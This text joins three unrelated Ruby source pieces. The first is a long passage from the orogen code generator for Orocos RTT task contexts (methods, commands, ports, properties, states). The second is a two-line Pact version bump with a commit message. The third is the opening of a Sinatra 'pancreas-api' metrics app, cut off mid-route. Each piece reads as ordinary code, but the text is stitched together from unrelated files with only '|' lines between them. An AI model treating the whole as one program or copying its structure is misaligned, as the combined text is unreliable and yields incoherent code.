"(" << arglist.join(", ") << ")"
end
end
# Representation of a RTT method. Instances of this object are usually
# created through TaskContext#method. The generated code will expect
# the class implementation (user-visible part) to define one method, to
# serve the call, with almost the same name that the method itself.
#
# For instance, the following definition
# method('MyMethod')
#
# will require the user-visible part to define
# [return value] myMethod([arguments]);
#
# (note that the first character of the method name has been set to
# lowercase to generate the C++ method name)
#
# The argument list of the C++ method (the first one) can be defined
# using Callable#argument. Its return type by using #returns. The
# default method signature is no return type (i.e. void) and no
# arguments.
#
# The name of the work and completion methods can be changed with
# #method_name.
#
# For instance,
# method('MyMethod').
# argument('x', 'double', 'the target X value').
# argument('y', 'double', 'the target Y value').
# method_name('move').
# returns('double')
#
# will require the user-visible part to define
# double move(double x, double y);
class Method < Callable
def initialize(task, name)
super
@method_name = self.name.dup
method_name[0, 1] = method_name[0, 1].downcase
end
def used_types # :nodoc:
[return_type].compact + super
end
# The return type of this method, as a Typelib::Type object.
# See #returns
attr_reader :return_type
# Sets the return type for this method. +type+ can either be the
# type name or a Typelib::Type object. In both cases, the required
# type must be defined in the component, either because it is part
# of its own toolkit or because it has been imported by a
# Component#load_toolkit call.
def returns(type)
if type
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
end
@return_type = type
self
end
# Returns the C++ signature for this method. Used in code
# generation only.
def signature(with_names = true)
result = ""
if return_type
result << return_type.full_name('::', true)
else
result << "void"
end
if with_names
result << " " <<
if block_given? then yield
else method_name
end
end
result << argument_signature(with_names)
end
def pretty_print(pp)
pp.text signature(true)
end
# call-seq:
# method_name new_name -> self
# method_name -> current_name
#
# Gets or sets the name of the C++ method which is to be called to
# serve this orocos method. It default to the method name with the
# first character set to lowercase (MyMethod becomes myMethod).
dsl_attribute(:method_name) { |value| value.to_s }
end
# Representation of a RTT command. Instances of this object are usually
# created through TaskContext#command. The generated code will expect
# the class implementation (user-visible part) to define two methods:
# * a _work_ method which is called once when the command is called. This
# method has a boolean return type and should return true if the command
# started, and false otherwise.
# * a _completion_ method which is called while the command is running.
# This method should return true when the command is finished and false
# otherwise.
#
# For instance, the following definition
# command('MyCommand')
#
# will require the user-visible part to define
# bool myCommand([arguments]);
# bool isMyCommandCompleted([arguments]);
#
# (note that the first character of the command name has been set to
# lowercase for the work-method name)
#
# The argument list of the work method (the first one) can be defined
# using Callable#argument. For the completion method, three choices are
# available:
# * no arguments at all
# * the same first argument that the work method
# * all the same arguments than the work method
#
# The default is to have all arguments. This can be changed using
# #completion_no_arguments, #completion_first_argument and
# #completion_all_arguments.
#
# The name of the work and completion methods can be changed with
# #work_method_name and #completion_method_name.
#
# For instance,
# command('my_command').
# argument('x', 'double', 'the target X value').
# argument('y', 'double', 'the target Y value').
# work_method_name('move').
# completion_method_name('hasReachedTarget').
# completion_no_arguments.
#
# will require the user-visible part to define
# bool move(double x, double y);
# bool hasReachedTarget();
class Command < Callable
# The C++ method name to be called to serve this Orocos command.
# This defaults to +name+, but you can customize it by using
# #method_name
dsl_attribute(:work_method_name) { |name| name.to_s }
# The C++ method name to be called to serve this Orocos command.
# This defaults to is+name+Completed, but you can customize it by
# using #method_name
dsl_attribute(:completion_method_name) { |name| name.to_s }
# Create a new callable object on the specified task and with the
# specified name. The setup of the callable should be done by
# calling the various setup methods after the object has been
# created.
def initialize(task, name)
super
@work_method_name = self.name.dup
work_method_name[0, 1] = work_method_name[0, 1].downcase
@completion_method_name = "is#{name}Completed"
@completion_signature_type = :all_arguments
end
# Which kind of signature do we want for the completion method ?
# It is either +:no_arguments+, +:first_argument+ or +:all_arguments+
# Use #completion_no_arguments, #completion_first_argument or #completion_all_arguments
# to change it
attr_reader :completion_signature_type
# The completion method for this command has no argument at all
def completion_no_arguments; @completion_signature_type = :no_arguments end
# The completion method for this command will be given the same
# first argument than the command method
def completion_first_argument; @completion_signature_type = :first_argument end
# The completion method for this command will be given the same
# arguments than the command method
def completion_all_arguments; @completion_signature_type = :all_arguments end
# A string representing the signature for the C++ work method. If
# +with_names+ is true, the name of the method and the names of the
# arguments are included in the string.
def work_signature(with_names = true)
result = "bool"
if with_names
result << " " <<
if block_given? then yield
else work_method_name
end
end
result << argument_signature(with_names)
end
# A string representing the signature for the C++ completion
# method. If +with_names+ is true, the name of the method and the
# names of the arguments are included in the string.
#
# The result depends on the completion_signature_type attribute,
# which can be changed by the completion_no_arguments,
# completion_first_argument and completion_all_arguments methods.
def completion_signature(with_names = true)
result = "bool"
if with_names
result << " " <<
if block_given? then yield
else completion_method_name
end
end
result << case completion_signature_type
when :no_arguments then "()"
when :first_argument
argument_signature(with_names).gsub(/,.*\)$/, ")")
when :all_arguments; argument_signature(with_names)
end
result
end
def pretty_print(pp) # :nodoc:
pp.text work_signature(true)
pp.breakable
pp.text completion_signature(true)
end
end
# Representation of TaskContext classes. This is usually created using
# Component#task_context.
#
# In the generated code, two classes are actually generated:
# * the auto-generated code is in <tt>.orogen/tasks/[name]Base.cpp</tt>
# and <tt>.orogen/tasks/[name]Base.hpp</tt>. These files define the
# various attributes related to the task context (i.e. port and
# attribute objects) in an <tt>[component.name]::[name]Base</tt> class.
# * the user-visible code is in <tt>tasks/[name].cpp</tt> and
# <tt>tasks/[name].hpp</tt>. These files are the ones that define the
# <tt>[component.name]::[name]</tt> class, which is a direct subclass
# of the <tt>[component.name]::[name]Base</tt> class.
#
# By default, the +Base+ class derives from the
# <tt>RTT::TaskContext</tt> class. This can be changed by using the
# #subclasses method.
#
# For all task context objects (ports, properties, ...) there is one
# attribute, of the right RTT class, added to the generated TaskContext
# subclass. The attribute name is always the _[object name], so for
# instance the presence of the following statement
# output_port('time', 'double')
#
# will cause a <tt>OutputPort<double></tt> attribute named
# <tt>_time</tt> to be added to the generated class (more specifically,
# to the +Base+ subclass).
class TaskContext
# The component this task is part of
attr_reader :component
# The task name
attr_reader :name
# The subclass of TaskContext which should be used to define this
# class
attr_reader :superclass
# A set of classes the TaskContext has to implement as well
attr_reader :implemented_classes
# A set of Port objects that can be created at runtime
attr_reader :dynamic_ports
def self.enumerate_inherited_set(each_name, attribute_name = each_name) # :nodoc:
class_eval <<-EOD
def all_#{attribute_name}; each_#{each_name}.to_a end
def self_#{attribute_name}; @#{attribute_name} end
def each_#{each_name}(only_self = false, &block)
if block_given?
if !only_self && superclass
superclass.each_#{each_name}(false, &block)
end
@#{attribute_name}.each(&block)
else
enum_for(:each_#{each_name}, only_self)
end
end
EOD
end
def to_s; "#<#<Orocos::Generation::TaskContext>: #{name}>" end
# Call to declare that this task model is not meant to run in
# practice
def abstract; @abstract = true; end
# True if this task model is only meant to declare an interface, and
# should not be deployed
def abstract?; @abstract end
# Declares that this task context is a subclass of the following
# TaskContext class. +task_context+ can either be a class name or a
# TaskContext instance. In both cases, it must be defined in the
# scope of the enclosing Component object -- i.e. either defined in
# it, or imported by a Component#using_task_library call.
def subclasses(task_context)
@superclass = component.find_task_context task_context
if !superclass
raise ArgumentError, "no such task context #{task_context}"
end
end
# Declares that this task context is also a subclass of the
# following class. +name+ does not have to be a task context class.
def implements(name, include_file = nil)
@implemented_classes << [name, include_file]
end
# True if the task context implements a parent class which matches
# +name+. +name+ can either be a string or a regular expression.
def implements?(name)
class_name == name ||
(superclass && superclass.implements?(name)) ||
@implemented_classes.any? { |class_name, _| name === class_name }
end
##
# :method: required_activity?
#
# True if the current value of default_activity is actually
# required by the task context implementation
attr_predicate :required_activity?, true
##
# :method: required_activity
# :call-seq:
# required_activity 'activity_type', *args
#
# The kind of activity that must be used for this task context. This
# is the name of the corresponding method on the deployment objects.
# See ACTIVITY_TYPES for the list of known activity types.
#
# See also #default_activity
dsl_attribute :required_activity do |type, *args|
if respond_to?(type.to_sym)
send(type.to_sym)
else
default_activity type, *args
end
self.required_activity = true
end
##
# :method: default_activity
# :call-seq:
# default_activity 'avtivity_type', *args
#
# The kind of activity that should be used by default. This is the
# name of the corresponding method on the deployment objects
# (:periodic, :aperiodic, :slave, :irq_driven, :fd_driven)
#
# This is a default value, i.e. the use of such an activity
# is not mandatory. If #required_activity is set to true, then
# this activity is the only kind of activity that can be used
# with this task context.
#
# See also #required_activity
dsl_attribute :default_activity do |type, *args|
if required_activity? && @default_activity
raise ArgumentError, "the #{default_activity[0]} activity is required, you cannot change it"
end
type = type.to_sym
if !ACTIVITY_TYPES.has_key?(type)
raise ArgumentError, "#{type} is not a valid activity type"
end
[type, *args]
end
# True if this task context is defined by one of our dependencies.
attr_predicate :external_definition?, true
# The name of the header file containing the C++ code which defines
# this task context
def header_file
if external_definition?
library_name, name = self.name.split("::")
"#{library_name.downcase}/#{name}.hpp"
else
"#{component.name.downcase}/#{basename}.hpp"
end
end
# Returns the name without an eventual library name
def basename
library_name, name = self.name.split("::")
name || library_name
end
# True if we are generating for Linux
def linux?; component.linux? end
# True if we are generating for Xenomai
def xenomai?; component.xenomai? end
def class_name
name
end
# Create a new task context in the given component and with
# the given name. If a block is given, it is evaluated
# in the context of the newly created TaskContext object.
#
# TaskContext objects should not be created directly. You should
# use Component#task_context for that.
def initialize(component, name)
if name == component.name
raise ArgumentError, "tasks and projects must not have the same name"
elsif name !~ /^(\w+::)*\w+$/
raise ArgumentError, "task names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
@component = component
@superclass = component.default_task_superclass
@implemented_classes = []
@name = name
# This is an array, as we don't want to have it reordered
# unnecessarily
@states = Array.new
default_activity 'triggered'
@properties = Array.new
@methods = Array.new
@commands = Array.new
@ports = Array.new
@dynamic_ports = Array.new
@event_ports = Array.new
@initial_state = 'Stopped'
@fixed_initial_state = false
@needs_configuration = false
end
def pretty_print_interface(pp, name, set)
if set.empty?
pp.text "No #{name.downcase}"
else
pp.text name
pp.nest(2) do
set.each do |element|
pp.breakable
element.pretty_print(pp)
end
end
end
pp.breakable
end
def pretty_print(pp)
pp.text "------- #{name} ------"
pp.breakable
ports = each_port.to_a + each_dynamic_port.to_a
pretty_print_interface(pp, "Ports", ports)
pretty_print_interface(pp, "Properties", each_property.to_a)
pretty_print_interface(pp, "Methods", each_method.to_a)
pretty_print_interface(pp, "Commands", each_command.to_a)
end
# Returns the object in +set_name+ for which #name returns +name+,
# or ArgumentError if there is none
def get_object(set_name, name)
set = send("all_#{set_name}")
obj = set.find { |o| o.name == name }
if !obj
raise ArgumentError, "there is no #{name} in #{set_name}"
end
obj
end
# Raises ArgumentError if an object named +name+ is already present
# in the set attribute +set_name+.
#
# This is an internal helper method
def check_uniqueness(set_name, name) # :nodoc:
# Check if that name is a method name in orocos.rb as well ...
# To warn about name clashes
if @orocos_rb.nil?
begin
require 'orocos'
@orocos_rb = true
rescue LoadError
@orocos_rb = false
end
end
if name.to_str != 'state' && @orocos_rb && !component.kind_of?(ImportedProject)
if Orocos::TaskContext.instance_methods.find { |n| n.to_s == name.to_str }
STDERR.puts "WARN: #{name} is a method name used in orocos.rb"
STDERR.puts "WARN: if you keep that name, you will not be able to use shortcut access in orocos.rb"
STDERR.puts "WARN: for instance, for a property, you will have to do"
STDERR.puts "WARN: my_task.property('#{name}').write(new_value)"
STDERR.puts "WARN: instead of the shorter and clearer"
STDERR.puts "WARN: my_task.#{name} = new_value"
end
end
set = send("all_#{set_name}")
if set.find { |o| o.name == name }
raise ArgumentError, "there is already a #{name} in #{set_name}"
end
end
private :check_uniqueness
# Add in +self+ the ports of +other_model+ that don't exist.
#
# Raises ArgumentError if +other_model+ has ports whose name is used
# in +self+, but for which the definition is different.
def merge_ports_from(other_model)
other_model.each_port do |p|
begin
self_port = port(p.name)
if (self_port.class != p.class || self_port.type != p.type)
raise ArgumentError, "cannot merge as the output port #{self_port.name} have different meanings"
end
rescue ArgumentError
@ports << p
end
end
end
# If true, then the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have a no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state?; @fixed_initial_state || needs_configuration? || (superclass.fixed_initial_state? if superclass) end
# Declares that the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have a no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state; @fixed_initial_state = true end
# If true, the task context will start in the PreOperational state,
# and will not be able to run until configure() has been called and
# returned true.
#
# When subclassing, it is NOT possible to have a subclass starting
# in the Stopped state while its superclass starts from
# PreOperational.
def needs_configuration?; @needs_configuration || (superclass.needs_configuration? if superclass) end
# Declares that this task needs to be configured before it is
# started (i.e. its initial state will be PreOperational instead of
# Stopped).
#
# If #fixed_initial_state? returns true, then this method raises
# ArgumentError. This is done so that it is possible to declare
# that some task contexts's implementation require the initial
# state to be either PreOperational or Stopped.
def needs_configuration
if superclass && superclass.fixed_initial_state?
raise ArgumentError, "cannot change the start state of this task context: the superclass #{superclass.name} does not allow it"
elsif fixed_initial_state? && !needs_configuration?
raise ArgumentError, "cannot change the start state of this task context: #fixed_initial_state has been specified for it"
end
@needs_configuration = true
end
# Create a new property with the given name, type and default value
# for this task. This returns the Property instance representing
# the new property, whose methods can be used to configure the
# property further. +type+ is the type name for that attribute. It
# can be either in Typelib notation (/std/string) or in C++
# notation (std::string). This type must be defined either by the
# component's own toolkit, or by toolkits imported with
# Component#load_toolkit.
#
# The generated task context will have a <tt>_[property name]</tt>
# attribute of class RTT::Property<type>.
#
# For instance, the following definition
# property('device_name', '/std/string/, '').
# doc 'the device name to connect to'
#
# Will generate a task context with a <tt>_device_name</tt>
# attribute of type RTT::Property<std::string>.
def property(name, type, default_value = nil)
check_uniqueness :properties, name
type = component.find_type(type)
@properties << Property.new(self, name, type, default_value)
@properties.last
end
# Asks orogen to implement the extended state support interface in
# the Base class. This adds:
# * a 'state' output port in which the current task's state is written
# * an enumeration type named CLASS_NAME_STATES in which one value
# is defined for each states
#
# Note that, for all of this to work, it is actually required that
# all the hooks overloaded in the task's class call their parent in
# the call chain.
def extended_state_support
state_port = each_port.find { |p| p.name == "state" }
if state_port
if state_port.kind_of?(InputPort)
raise ArgumentError,
"there is already an input port called 'state', cannot enable extended state support"
elsif state_port.type_name != "/int"
raise ArgumentError,
"there is already an output port called 'state', but it is not of type 'int' (found #{state_port.typename}"
end
else
output_port 'state', '/int'
end
# Force toolkit generation. The toolkit code will take care of
# generating the state enumeration type for us
component.toolkit(true)
@extended_state_support = true
end
# True if the extended state support is enabled
def extended_state_support?
@extended_state_support || (superclass.extended_state_support? if superclass)
end
# Returns true if the given state name is already used
def state?(name)
state_kind(name) || (superclass.state?(name.to_s) if superclass)
end
STATE_TYPES = [ :toplevel, :runtime, :error, :fatal ]
# Internal method for state definition
def define_state(name, type) # :nodoc:
name = name.to_s
type = type.to_sym
if !STATE_TYPES.include?(type)
raise ArgumentError, "unknown state type #{type.inspect}"
end
if !extended_state_support?
extended_state_support
end
if kind = state_kind(name.to_s)
if kind != type
raise ArgumentError, "state #{name} is already defined as #{kind}, cannot overload into #{type}"
end
else
@states << [name, type]
@states = @states.sort_by { |n, _| n }
end
end
# Returns what kind of state +name+ is
def state_kind(name) # :nodoc:
if s = each_state.find { |n, t| n == name }
s[1]
end
end
# Returns the type name for the state enumeration
def state_type_name # :nodoc:
"#{basename}_STATES"
end
# Returns the C++ value name for the given state when defined
# globally
def state_global_value_name(state_name, state_type) # :nodoc:
"#{basename}_#{state_name.upcase}"
end
# Returns the C++ value name for the given state when defined in the
# associated class scope.
def state_local_value_name(state_name, state_type) # :nodoc:
state_name.upcase
end
##
# :method: each_runtime_state
#
# Enumerates all the runtime states
#
# See also #each_error_state, #each_fatal_state and #each_state
##
# :method: each_error_state
#
# Enumerates all error states defined for this task context
#
# See also #each_runtime_state, #each_fatal_state, and #each_state
##
# :method: each_fatal_state
#
# Enumerates all error states defined for this task context
#
# See also #each_runtime_state, #each_error_state and #each_state
STATE_TYPES.each do |type|
class_eval <<-EOD
def each_#{type}_state
if block_given?
each_state do |name, type|
yield(name) if type == :#{type}
end
else
enum_for(:each_#{type}_state)
end
end
EOD
end
# Enumerates each state defined on this task context.
def each_state(&block)
if block_given?
superclass.each_state(&block) if superclass
@states.each(&block)
else
enum_for(:each_state)
end
end
# call-seq:
# states -> set of states
#
# Declares a toplevel state. It should be used only to declare RTT's
# TaskContext states.
def states(*state_names) # :nodoc:
if state_names.empty?
return @states
end
state_names.each do |name|
define_state(name, :toplevel)
end
end
# Declares a certain number of runtime states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #error_states, #each_state, #each_runtime_state
def runtime_states(*state_names)
state_names.each do |name|
define_state(name, :runtime)
end
end
# Declares a certain number of runtime error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #each_state, #each_error_state
def error_states(*state_names)
state_names.each do |name|
define_state(name, :error)
end
end
# Declares a certain number of fatal error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #error_states, #each_state, #each_error_state
def fatal_states(*state_names)
state_names.each do |name|
define_state(name, :fatal)
end
end
# This method is an easier way use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
# input_port 'image', '/boost/shared_ptr</Image>'
#
# you can write
#
# input_port 'image', shared_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def shared_ptr(name)
base_type = component.find_type(name)
full_name = "/boost/shared_ptr<#{base_type.name}>"
begin
component.find_type(full_name)
rescue Typelib::NotFound
component.toolkit { shared_ptr(name) }
component.find_type(full_name)
end
end
# This method is an easier way use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
# input_port 'image', '/RTT/ReadOnlyPointer</Image>'
#
# you can write
#
# input_port 'image', ro_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def ro_ptr(name)
base_type =
begin
component.find_type(name)
rescue Typelib::NotFound
raise ArgumentError, "type #{name} is not available"
end
full_name = "/RTT/ReadOnlyPointer<#{base_type.name}>"
begin
component.find_type(full_name)
rescue Typelib::NotFound
component.toolkit { ro_ptr(name) }
component.find_type(full_name)
end
end
# Create a new method with the given name. Use the returned Method
# object to configure the method further.
#
# In Orocos, a method is a synchronous method call to a task context:
# the caller will block until the method's procedure is called
def method(name)
@methods << Method.new(self, name)
@methods.last
end
# The set of commands that have been added at this level of the
# class hierarchy.
def new_commands
super_names = superclass.all_commands.map(&:name).to_set
@commands.find_all do |t|
!super_names.include?(t)
end
end
# The set of commands that are overloaded in this task class
def overloaded_commands
super_names = superclass.all_commands.map(&:name).to_set
@commands.find_all do |t|
!super_names.include?(t)
end
end
# Create a new command with the given name. Use the returned
# Command object to configure the method further. In Orocos, a
# command is an asynchronous method call to a task context.
#
# The generated class will have a <tt>_[command name]</tt>
# attribute of class RTT::Command<>. For instance,
#
# command('my_command').
# doc 'description of command'
#
# will generate an attribute <tt>_my_command</tt> of type
# RTT::Command. The
def command(name)
@commands << Command.new(self, name)
@commands.last
end
##
# :method: each_dynamic_port
# :call-seq:
# each_dynamic_port(only_self = false) { |port| }
#
# Yields all dynamic ports that are defined on this task context.
##
# :method: all_dynamic_ports
# :call-seq:
# all_dynamic_ports -> set_of_ports
#
# Returns the set of all dynamic ports that are defined on this task
# context
##
# :method: self_dynamic_ports
# :call-seq:
# self_dynamic_ports -> set_of_ports
#
# Returns the set of dynamic ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("dynamic_port", "dynamic_ports")
##
# :method: each_port
# :call-seq:
# each_port(only_self = false) { |port| }
#
# Yields all static ports that are defined on this task context.
##
# :method: all_ports
# :call-seq:
# all_ports -> set_of_ports
#
# Returns the set of all static ports that are defined on this task
# context
##
# :method: self_ports
# :call-seq:
# self_ports -> set_of_ports
#
# Returns the set of static ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("port", "ports")
##
# :method: each_property
# :call-seq:
# each_property(only_self = false) { |property| }
#
# Yields all properties that are defined on this task context.
##
# :method: all_properties
# :call-seq:
# all_properties -> set_of_properties
#
# Returns the set of all properties that are defined on this task
# context
##
# :method: self_properties
# :call-seq:
# self_properties -> set_of_properties
#
# Returns the set of properties that are added at this level of the
# model hierarchy. I.e. properties that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("property", "properties")
##
# :method: each_command
# :call-seq:
# each_command(only_self = false) { |command| }
#
# Yields all commands that are defined on this task context.
##
# :method: all_commands
#
# :call-seq:
# all_commands -> set_of_commands
#
# Returns the set of all commands that are defined on this task
# context
##
# :method: self_commands
# :call-seq:
# self_commands -> set_of_commands
#
# Returns the set of commands that are added at this level of the
# model hierarchy. I.e. commands that are either newly defined on
# this task context, or overload commands from the parent models.
enumerate_inherited_set("command", "commands")
##
# :method: each_method
# :call-seq:
# each_method(only_self = false) { |method| ... }
#
# Yields all methods that are defined on this task context.
##
# :method: all_methods
# :call-seq:
# all_methods -> set_of_methods
#
# Returns the set of all methods that are defined on this task
# context
##
# :method: self_methods
# :call-seq:
# self_methods -> set_of_methods
#
# Returns the set of methods that are added at this level of the
# model hierarchy. I.e. methods that are either newly defined on
# this task context, or overload methods from the parent models.
enumerate_inherited_set("method", "methods")
# Methods that are added by this task context (i.e. methods that are
# defined there but are not present in the superclass)
def new_methods
super_names = superclass.all_methods.map(&:name).to_set
@methods.find_all do |t|
!super_names.include?(t)
end
end
# call-seq:
# output_port 'name', '/type'
#
# Add a new write port with the given name and type, and returns the
# corresponding OutputPort object.
#
# See also #input_port
def output_port(name, type)
check_uniqueness(:ports, name)
@ports << OutputPort.new(self, name, type)
@ports.last
rescue Typelib::NotFound
raise ConfigError, "type #{type} is not declared"
end
# Enumerates the output ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_output_port(&block)
each_port.
find_all { |p| p.kind_of?(OutputPort) }.
each(&block)
end
# Returns the port named +name+ or raises ArgumentError if no such
# port exists
def port(name)
if p = each_port.find { |p| p.name == name }
p
else raise ArgumentError, "#{self} has no port named '#{name}'"
end
end
# call-seq:
# input_port 'name', '/type'
#
# Add a new write port with the given name and type, and returns the
# corresponding InputPort object.
#
# See also #output_port
def input_port(name, type)
check_uniqueness(:ports, name)
@ports << InputPort.new(self, name, type)
@ports.last
rescue Typelib::NotFound
raise ConfigError, "type #{type} is not declared"
end
# call-seq:
# dynamic_input_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen himself, but
# can be used by potential users of the orogen specification.
def dynamic_input_port(name, type)
dynamic_ports << DynamicInputPort.new(self, name, type)
dynamic_ports.last
end
# call-seq:
# dynamic_output_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen himself, but
# can be used by potential users of the orogen specification.
def dynamic_output_port(name, type)
dynamic_ports << DynamicOutputPort.new(self, name, type)
dynamic_ports.last
end
# Returns true if there is a dynamic port definition that matches
# the given name and type pair.
#
# If +type+ is nil, the type is ignored in the matching.
def dynamic_port?(name, type)
dynamic_input_port?(name, type) || dynamic_output_port?(name, type)
end
# Returns the set of dynamic input port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def find_dynamic_input_ports(name, type)
dynamic_ports.find_all { |p| p.kind_of?(InputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if there is an input port definition that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def dynamic_input_port?(name, type = nil)
!find_dynamic_input_ports(name, type).empty?
end
# Returns the set of dynamic output port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def find_dynamic_output_ports(name, type)
dynamic_ports.find_all { |p| p.kind_of?(OutputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if an output port of the given name and type could be
# created at runtime.
def dynamic_output_port?(name, type = nil)
!find_dynamic_output_ports(name, type).empty?
end
# Enumerates the input ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_input_port(&block)
each_port.
find_all { |p| p.kind_of?(InputPort) }.
each(&block)
end
# A set of ports that will trigger this task when they get updated.
attr_reader :event_ports
# Declares that this task context is designed to be woken up when
# new data is available on one of the given ports (or all already
# defined ports if no names are given).
def port_driven(*names)
names = names.map { |n| n.to_s }
relevant_ports = if names.empty? then all_ports.find_all { |p| p.kind_of?(InputPort) }
else
names.map do |n|
obj = get_object(:ports, n)
if !obj.kind_of?(InputPort)
raise ArgumentError, "only read ports can be used as triggers for a task context"
end
obj
end
end
@event_ports.concat(relevant_ports)
end
# Declares that this task context is designed to be woken up when
# new data is available on a I/O file descriptor. The resulting task
# must also use the fd_driven activity, which is done by default.
#
# The only thing you have to do in the implementation is therefore
#
# task = task("MyDFDrivenTask").
# start
#
# To configure the activity, you will have to implement the
# getFileDescriptor() method that is generated in the target class.
def fd_driven
default_activity "fd_driven"
needs_configuration
end
# True if this task context's default activity is a FD-driven activity
def fd_driven?
default_activity.first == :fd_driven
end
# The set of task libraries from which we depend on, because of our
# superclasses and implements
def used_task_libraries
component.used_task_libraries.find_all do |tasklib|
tasklib.tasks.any? do |task|
task.component == tasklib && implements?(task.name)
end
end
end
# Returns the set of types that are used to define this task
# context, as an array of subclasses of Typelib::Type.
def interface_types
(all_properties + all_methods + all_commands + all_ports).
map { |obj| obj.used_types }.
flatten.to_value_set.to_a
end
# Returns the set of toolkits that define the types used in this
# task's interface. They are required at compile and link time
# because of the explicit instanciation of interface templates
# (ports, ...)
def used_toolkits
types = interface_types
component.used_toolkits.find_all do |tk|
types.any? do |type|
tk.includes?(type.name)
end
end.to_value_set
end
# Generate the code files for this task. This builds to classes:
#
# * a #{task.name}Base class in .orogen/tasks/#{task.name}Base.{cpp,hpp}
# which is the automatically generated part of the task.
# * a #{task.name} class in tasks/#{task.name}.{cpp,hpp} which is
# the user-provided part of the task. This class is a public
# subclass of the Base class.
def generate
return if external_definition?
# Make this task be available in templates as 'task'
task = self
base_code_cpp = Generation.render_template 'tasks', 'TaskBase.cpp', binding
base_code_hpp = Generation.render_template 'tasks', 'TaskBase.hpp', binding
Generation.save_automatic "tasks", "#{basename}Base.cpp", base_code_cpp
Generation.save_automatic "tasks", "#{basename}Base.hpp", base_code_hpp
code_cpp = Generation.render_template "tasks", "Task.cpp", binding
code_hpp = Generation.render_template "tasks", "Task.hpp", binding
Generation.save_user "tasks", "#{basename}.cpp", code_cpp
Generation.save_user "tasks", "#{basename}.hpp", code_hpp
fake_install_dir = File.join(component.base_dir, AUTOMATIC_AREA_NAME, component.name)
FileUtils.mkdir_p fake_install_dir
FileUtils.ln_sf File.join(component.base_dir, "tasks", "#{basename}.hpp"),
File.join(fake_install_dir, "#{basename}.hpp")
FileUtils.ln_sf File.join(component.base_dir, AUTOMATIC_AREA_NAME, "tasks", "#{basename}Base.hpp"),
File.join(fake_install_dir, "#{basename}Base.hpp")
self
end
# Generate a graphviz fragment to represent this task
def to_dot
html_escape = lambda { |s| s.gsub(/</, "<").gsub(/>/, ">") }
html_table = lambda do |title, lines|
label = "<TABLE BORDER=\"0\" CELLBORDER=\"1\" CELLSPACING=\"0\">\n"
label << " <TR><TD>#{title}</TD></TR>\n"
label << " <TR><TD>\n"
label << lines.join("<BR/>\n")
label << " </TD></TR>\n"
label << "</TABLE>"
end
result = ""
result << " node [shape=none,margin=0,height=.1];"
label = ""
label << "<TABLE BORDER=\"0\" CELLBORDER=\"0\" CELLSPACING=\"0\">\n"
label << " <TR><TD>#{name}</TD></TR>"
properties = all_properties.
map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
if !properties.empty?
label << " <TR><TD>#{html_table["Properties", properties]}</TD></TR>"
end
input_ports = all_ports.
find_all { |p| p.kind_of?(InputPort) }.
map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
if !input_ports.empty?
label << " <TR><TD>#{html_table["Input ports", input_ports]}</TD></TR>"
end
output_ports =all_ports.
find_all { |p| p.kind_of?(OutputPort) }.
map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
if !output_ports.empty?
label << " <TR><TD>#{html_table["Output ports", output_ports]}</TD></TR>"
end
label << "</TABLE>"
result << " t#{object_id} [label=<#{label}>]"
result
end
end
end
end
|
module Pact
VERSION = "0.1.4"
end
Bumping micro version
module Pact
VERSION = "0.1.5"
end
|
require 'sinatra'
require 'haml'
require 'mongoid'
require 'rack/conneg'
require 'iso8601'
require 'dotenv'
require 'kramdown'
require 'rack-google-analytics'
require_relative 'models/metrics'
require_relative 'pancreas-api/helpers'
require_relative 'pancreas-api/racks'
require_relative 'pancreas-api/errors'
Dotenv.load unless ENV['RACK_ENV'] == 'test'
Mongoid.load!(File.expand_path("../mongoid.yml", File.dirname(__FILE__)), ENV['RACK_ENV'])
class PancreasApi < Sinatra::Base
get '/' do
respond_to do |wants|
wants.html {
haml :index, :locals => {
:title => 'pancreas-api',
:text => 'pancreas-api',
:bootstrap_theme => '../lavish-bootstrap.css',
:github => {
:user => 'pikesley',
:project => 'HbA1c',
:ribbon => 'right_gray_6d6d6d'
}
}
}
wants.other { error_406 }
end
end
get '/metrics' do
protected!
data = {
"metrics" => Metric.all.distinct(:name).sort.map do |name|
{
name: name,
url: "https://#{request.host}/metrics/#{name}.json"
}
end
}
respond_to do |wants|
wants.json { data.to_json }
wants.other { error_406 }
end
end
post '/metrics/:metric' do
protected!
j = JSON.parse request.body.read
j[:name] = params[:metric]
# require 'pry'
# binding.pry
if Metric.where(:datetime => DateTime.parse(j["datetime"])).first
if Metric.where(:datetime => DateTime.parse(j["datetime"])).update(value: j["value"])
return 201
else
return 500
end
else
@metric = Metric.new j
if @metric.save
return 201
else
return 500
end
end
end
get '/metrics/:metric' do
protected!
